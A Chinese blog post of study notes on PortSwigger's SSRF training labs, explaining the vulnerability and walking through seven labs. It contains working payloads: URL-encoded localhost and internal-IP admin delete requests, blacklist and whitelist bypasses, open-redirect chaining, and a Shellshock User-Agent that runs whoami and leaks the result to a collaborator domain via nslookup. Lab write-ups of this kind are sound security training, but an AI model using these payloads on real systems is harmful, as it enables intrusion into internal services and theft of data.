SSRF(一):PortSwigger靶场笔记

最新推荐文章于 2024-07-25 01:51:24 发布
最新推荐文章于 2024-07-25 01:51:24 发布
阅读量799 收藏 11
点赞数 13
文章标签: 笔记 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aaaadoga/article/details/140417871
版权

写在前面

该文章是关于作者在PortSwigger的SSRF靶场训练的记录和学习笔记
使用的工具为BurpSuite Pro
有问题请留言或联系邮箱1586937085@qq.com

漏洞简介

SSRF全称Server-Side Request Forgery(服务端请求伪造),这种漏洞允许攻击者操纵服务端向非预期目标发起请求
SSRF根据有无回显可分为普通SSRF和BlindSSRF
对使用黑名单机制防护SSRF可以使用以下方法绕过(以127.0.0.1,localhost举例

  • 对IP地址表示方式进行转化
    • 十进制:2130706433
    • 八进制:017700000001
    • 缩写:127.1
  • 注册自己的域名,解析为127.0.0.1,也可以直接使用spoofed.burpcollaborator.net
  • 对请求url进行多重url编码

Labs

lab1

lab地址:Basic SSRF against the local server
该lab关注的情景是部署网站的本地机器,即localhost
通过该lab的条件是访问http://localhost/admin,删除carlos的账户
进入lab先尝试所有功能,然后观察burp suite的http history,发现一个可能存在的SSRF
l1-s1.png
使用http://localhost/admin发送请求,发现返回了admin页面,但是在浏览器中进行删除不成功,显示必须要有admin权限才能操作再次观察响应,发现删除功能的api端点
l1-s2.png
l1-s3.png
构造删除请求,成功执行,通过
l1-s4.png

lab2

lab地址:Basic SSRF against another back-end system
该lab关注的情景是部署网站的局域网内的其他机器
通过该lab的条件是探测局域网192.168.0.0/24网段中的服务,删除carlos账户
进入lab,按上述提到的流程操作,发现和lab1类似的漏洞点
构造http://192.168.0.1/admin发送请求,报错参数不存在
l2-s1.png
按照lab描述,将请求发送给intruder模块探测网段,发现192.168.0.160返回包的状态码是200
l2-s2.png
l2-s3.png
按照lab1的思路,构造url,通过
l2-s4.png

lab3

lab地址:Blind SSRF with out-of-band detection
该lab关注的情景是服务端运行分析工具读取了请求头的referrer字段,并且不会有结果回显到用户界面
通过该lab的条件是在服务端发起一起dns查询
先去collaborator生成一个随机的子域名
l3-s1.png
将请求商品详情的的请求发送到repeater,修改referrer字段
l3-s2.png
去collaborator页面观察是否有请求
l3-s3.png
收到请求,通过

lab4

lab地址:SSRF with blacklist-based input filter
该lab关注的情景是web应用基于黑名单机制对输入进行过滤,需要绕过过滤实施攻击
通过lab的条件是访问http://localhost/admin,删除carlos的账户
基于前两个lab的经验,我直接构造了以下请求,发现被阻止了
http%3a%2f%2f127.0.01%2fadmin%2fdelete%3fusername%3dcarlos
l4-s1.png
修改payload,将127.0.0.1修改为127.1,再次尝试,还是不成功
l4-s2.png
再次修改payload,对url的path部分(即admin)进行一次url编码,还是不成功
http%3a%2f%2f127.1%2f%61dmin%2fdelete%3fusername%3dcarlos
l4-s3.png
再次修改payload,对url的path部分进行二次url编码,成功删除carlos账户,通过
l4-s4.png

lab5

lab地址:SSRF with filter bypass via open redirection vulnerability
该lab关注的情景是web应用对url的host部分的校验非常完善,无法直接发起恶意的服务端请求,但是该域名下其他功能存在开放重定向漏洞,这时候可以通过设置开放重定向的url来实施SSRF
通过该lab的条件是访问http://192.168.0.12:8080/admin,删除carlos账户
进入lab后尝试所有的功能,发现lab1,lab2和lab4的攻击方式都不成功,发现该lab有一新功能请求如下
GET /product/nextProduct?currentProductId=7&path=
path是一个实施重定向的参数,并且存在开放重定向漏洞
l5-s1.png
l5-s2.png
仿照lab1的方式再次构造payload,构造stockApi参数如下stockApi=%2fproduct%2fnextProduct%3fcurrentProductId%3d7%26path%3dhttp%3a%2f%2f192.168.0.12%3a8080%2fadmin%2fdelete%3fusername%3dcarlos
发送请求,删除账户成功,通过
l5-s3.png

lab6

lab地址:Blind SSRF with Shellshock exploitation
该lab关注的情景是Blind SSRF
通过条件是探测网段192.168.0.0/24的8080端口,使用Shellshock漏洞获取到运行服务的OS的当前用户名
为了更好的探测网站是否存在SSRF漏洞,使用Collaborator EveryWhere插件
l6-s2.png
将lab的域名添加到target->scope中
l6-s1.png
然后浏览lab提供的页面,尝试各种操作,再次查看target->site map页面,发现提示收到了collaborator pingback,访问商品详情页的请求在User-Agent和Referrer字段可能有SSRF漏洞
l6-s3.png
将下列的请求发送到intruder中
GET /product?productId=2 HTTP/2
设置User-Agent为:() { :; }; /usr/bin/nslookup $(whoami).BURP-COLLABORATOR-SUBDOMAIN
设置Referrer为:http://192.168.0.1:8080
开始攻击
l6-s4.png
在collaborator客户端,收到两个dns请求,请求的域名包含了需要的用户名,提交通过
l6-s5.png

lab7

lab地址:SSRF with whitelist-based input filter
l7-s1.png
构造如下payload:
stockApi=http://localhost:80%2523@stock.weliketoshop.net/admin/delete?username=carlos
l7-s2.png

h4ckb0ss
关注
  • 13
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
国光师傅的SSRF靶场docker环境.zip
01-16
首先,靶场安全从业者提供了一个模拟真实网络环境的平台。通过构建类似实际网络的拓扑结构、部署各种安全设备和应用,靶场可以模拟出多样化的网络攻防场景。这使得安全人员能够在安全的环境中进行实际操作,全面...
国光的手把手带你用 SSRF 打穿内网靶场源码.zip
01-14
首先,靶场安全从业者提供了一个模拟真实网络环境的平台。通过构建类似实际网络的拓扑结构、部署各种安全设备和应用,靶场可以模拟出多样化的网络攻防场景。这使得安全人员能够在安全的环境中进行实际操作,全面...
SSRF漏洞解析
apple_52721339的博客
04-23 366
SSRF(Server-Side Request Forgery,服务端请求伪造)是指攻击者向服务端发送包含恶意 URL 链接的请求,借由服务端去访问此 URL ,以获取受保护网络内的资源的一种安全漏洞。SSRF 常被用于探测攻击者无法访问到的网络区域,比如服务器所在的内网,或是受防火墙访问限制的主机。 ​ SSRF 漏洞的产生,主要是因为在服务端的 Web 应用,需要从其他服务器拉取数据资源,比如图片、视频、文件的上传/下载、业务数据处理结果,但其请求地址可被外部用户控制。 ​ 请求地址被恶意利用的话,如
SSRF学习笔记
qq_63980959的博客
09-22 117
服务器端请求伪造(也称为 SSRF)是一种 Web 安全漏洞,允许攻击者诱导服务器端应用程序向非预期位置发出请求。在典型的 SSRF 攻击中,攻击者可能会导致服务器与组织基础设施内的仅限内部服务建立连接。在其他情况下,他们可能会强制服务器连接到任意外部系统,从而可能泄露授权凭据等敏感数据。
OSWE—我的代码审计之路
zkaqlaoniao的博客
06-12 1010
大家好,我是 zkaq-念旧。上周,我终于获得了我梦寐以求的 OSWE 认证,然后安心过了个节,现在我也算是半只脚踏进代码审计圈了。在本篇文章中,我将介绍有关于 OSWE 课程的信息、考试规则、解答常见疑问,以及分享我的备考经验,我将带领你一步一步拿到属于你自己的 OSWE 认证。疯狂暗示(话说社区好像没有 “证书分享” 板块,要不加一个?大家考了证都来分享分享经验和心得,争取掌控全员 OSCE3 [狗头])疯狂暗示我不会任何的内网渗透知识,但我在代码领域专精。
协议层安全相关《http请求走私与CTF利用》
蚁景网安学院
05-24 1103
 0x00前言  最近刷题的时候多次遇到HTTP请求走私相关的题目,但之前都没怎么接触到相关的知识点,只是在GKCTF2021--hackme中使用到了CVE-2019-20372(Nginx<1.17.7 请求走私漏洞),具体讲就是通过nginx的走私漏洞访问到Weblogic Console的登录页面,然后打Weblogic历史漏洞读取flag。当时做那道题的时候对走私漏洞没有深入理解,今天打ISCC2022的时候又遇到了一道利用gunicorn<20.04请求走私漏洞绕wa...
SSRF-Testing:SSRF(服务器端请求伪造)测试资源
04-23
SSRF(服务器端请求伪造)测试资源 基于快速URL的绕过: http://google.com:80+&@127.88.23.245:22/#+@google.com:80/ http://127.88.23.245:22/+&@google.com:80#+@google.com:80/ ...
deepseek-vl 论文阅读笔记
samoyan的博客,记录技术成长~
07-22 1093
我们的语言模型基于DeepSeek LLM(DeepSeek-AI,2024),其微设计大体遵循LLaMA(Touvron等,2023a,b)的设计,采用带有RMSNorm(Zhang和Sennrich,2019)函数的Pre-Norm结构,并使用SwiGLU(Shazeer,2020)作为前馈网络(FFN)的激活函数,中间层维度为8/3模型维度。此外,我们引入了一种新的“模态预热”策略。为了促进创新并支持广泛的应用需求,我们公开了两个版本的模型,分别为1.3B和7B,以满足不同计算能力的需求。
ZYNQ 入门笔记(零):概述
记录代码与生活
07-21 801
作为 AMD Xilinx SoC 的重要组成部分之一,Zynq 系列在视频编码、网络加速、射频信号处理等领域占据重要地位,其将 ARM 硬核 (PS) 与可编程逻辑 (PL) 集成在一块芯片内部,在提升系统整体性能的同时简化了设计流程。然而,初次接触 Zynq 的开发者可能会面临诸多困难,如工具链、开发流程、Block Design、AXI 总线、PS & PL 交互、联合调试等。笔者在此将学习过程中的笔记加以整理,希望能帮助大家快速入门 Zynq,体会软硬件联合开发的乐趣
【Blockly图形化积木编程二次开发学习笔记】5.自动保存与恢复
乙酸氧铍的博客
07-21 209
/ 用户离开页面时自动将块备份到本地存储中。关闭后再次打开,工作区仍存在。// 从本地存储中恢复块。
Typora笔记上传到CSDN
最新发布
m0_48362854的博客
07-25 221
我花了一个小时弄这个 找了很多csdn的笔记 都弄完感觉最方便的还是直接在csdn上写(因为有的之前不是用的阿里云oss 而是gitee 免费仓库 但是好像后来不能使用了 就会导致你上传的笔记图片不显示 很麻烦 使用阿里云或者腾讯云的话 需要花钱 虽然两块钱用一年 但是感觉也是很麻烦 不如直接在网页上写写算了 当然如果笔记图片很多的 还是建议配置一下 )参考这个配置完阿里云oss 没什么问题 但是PicGo也是参考他的 因为版本是旧的 可以点击我下边的官方链接下载。图片的链接是本地的 当然没法显示。
SAP PP学习笔记31 - 计划运行的步骤2 - Scheduling(日程计算),BOM Explosion(BOM展开)
shi_ly的专栏
07-24 497
本章主要讲Scheduling(日程计算),其中包括 外部调达中的调度,生产订单中的调度,修改需求日期(其实就是在物料中增加安全时间和BOM中的提前期偏置量)。另外还讲了BOM展开的内容,详细讲了BOM选择的各种方法,除了按数量选BOM之外,还有其他比如 按日期,按生产版本等,而其中按日期又分为按订单开始日期,订单终了日期等,越趋复杂。
C++笔记3:基类指针delete子类对象的内存泄漏问题
subtitle_的博客
07-21 251
C++笔记3:基类指针delete子类对象的内存泄漏问题
【学习笔记】子集DP
Brute♂force
07-24 661
有一类问题和子集有关。给你一个集合S,令T为S的超集,也就是S所有子集的集合,求T中所有元素的和。
【学习笔记】无人机系统(UAS)的连接、识别和跟踪(八)-无人机探测与避让(DAA)机制
u011376987的博客
07-21 979
3GPP TS 23.256 技术规范,主要定义了3GPP系统对无人机(UAV)的连接性、身份识别、跟踪及A2X(Aircraft-to-Everything)服务的支持。
任务3 git基础知识(主要是pr的笔记
晓飞趋势
07-21 359
暂存区(Staging Area): 暂存区是 Git 中独有的一个概念,位于 .git 目录中的一个索引文件,记录了下一次提交时将要存入仓库区的文件列表信息。工作区(Working Directory): 当我们在本地创建一个 Git 项目,或者从 GitHub 上 clone 代码到本地后,项目所在的这个目录就是“工作区”。仓库区 / 本地仓库(Repository): 在项目目录中,.git 隐藏目录不属于工作区,而是 Git 的版本仓库。git revert 通过创建一个新的提交来撤销之前的提交。
html笔记
weixin_51644244的博客
07-22 2270
/</</</本地访问:file:///D:\Project\html\html01\html01/第一章.htmlhttp://https:// 加密协议网络传输协议 超文本传输协议常见的:** < a >、< strong >、< b >、< em >、< i >、< del >、< s >、< ins >、< u >、< span >、< img />、< input />、< select >、< textarea >、< br />**、等,其中 < span > 标签是最典型的行内元素。
学习笔记---java篇(0723)
m0_70630166的博客
07-23 698
java、数据类型、循环、选择等
pikachu靶场ssrf
08-07
对于Pikachu靶场SSRF,我了解到Pikachu是一个开源的靶场平台,用于测试和学习网络安全方面的知识和技能。SSRF(Server Side Request Forgery)是一种攻击技术,攻击者可以利用漏洞发送伪造的请求,从而访问应用程序内部的其他资源。可以使用Pikachu靶场来模拟和学习SSRF攻击和防御的技术。请注意,SSRF是一种违法行为,任何未经授权的尝试都是不合法的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值